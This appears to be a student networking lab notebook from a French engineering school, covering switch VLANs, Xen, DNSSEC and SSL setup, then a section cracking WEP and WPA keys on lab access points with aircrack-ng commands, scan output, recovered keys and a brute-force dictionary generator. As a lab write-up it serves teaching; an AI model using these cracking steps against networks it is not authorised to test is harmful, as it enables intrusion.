Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
 For some fields there will be a default value,&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord &lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:bielloumutherfucker.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 Please enter the following 'extra' attributes&lt;br /&gt;
 to be sent with your certificate request&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, ls clefs ont été générées : &lt;br /&gt;
 &lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
 Ironman.csr  Ironman.key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Et nous pouvons donner la CSR à Gandhi afin d'activer la procédure d'activation.&lt;br /&gt;
&lt;br /&gt;
De façon à recevoir le mail sur admin@bielloumutherfucker.space, nous devons modifier le fichier /etc/aliases et y rajouter la ligne suivante:&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat validé, il faut déplacer les clefs dans les dossiers suivants :&lt;br /&gt;
&lt;br /&gt;
 cp Ironman.key /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
 cp certificate-380187.crt /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
 cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem (clef intermédiaire)&lt;br /&gt;
&lt;br /&gt;
On effectue ensuite un rehash des certificats :&lt;br /&gt;
&lt;br /&gt;
 c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 6860aa7d.0&lt;br /&gt;
 bielloumutherfucker.space.crt =&amp;gt; 5692355e.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; a036afff.0&lt;br /&gt;
 ssl-cert-snakeoil.pem =&amp;gt; 4390636f.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; 8544bf03.0&lt;br /&gt;
 GandiStandardSSLCA2.pem =&amp;gt; e279a80b.0&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le fichier ''000-bielloumutherfucker.space-ssl.conf'' dans le dossier /etc/apache2/sites-available :&lt;br /&gt;
&lt;br /&gt;
 #NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.167:443&amp;gt;&lt;br /&gt;
                ServerName www.bielloumutherfucker.space&lt;br /&gt;
                ServerAlias bielloumutherfucker.space&lt;br /&gt;
                DocumentRoot /var/www/html/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/bielloumutherfucker.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/bielloumutherfucker.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/html&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
 ServerName &amp;quot;bielloumutherfucker.space&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Puis on modifie le fichier /etc/apache/ports.conf afin qu'apache écoute sur le port 443 (ssl) :&lt;br /&gt;
&lt;br /&gt;
 Listen 80 443&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On doit ensuite autoriser apache à utiliser son module ssl : &lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Puis on autorise notre site à utiliser ssl :&lt;br /&gt;
&lt;br /&gt;
 a2ensite 000-bielloumutherfucker.space-ssl.conf&lt;br /&gt;
&lt;br /&gt;
Ensuite :&lt;br /&gt;
&lt;br /&gt;
 service apache2 restart&lt;br /&gt;
 service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Maintenant, lorsqu'on se connecte sur notre site avec le préfixe &amp;quot;https://&amp;quot;, le site s'ouvre bien, et on aperçoit un cadenas vert certifiant que le site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ssl.png]]&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35769</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35769"/>
				<updated>2016-12-08T13:58:04Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation du site via certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
